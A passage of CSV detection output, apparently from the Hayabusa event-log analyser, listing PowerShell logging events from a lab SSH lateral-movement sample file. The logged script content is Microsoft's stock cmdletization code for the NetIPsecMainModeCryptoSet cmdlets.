[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.612 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 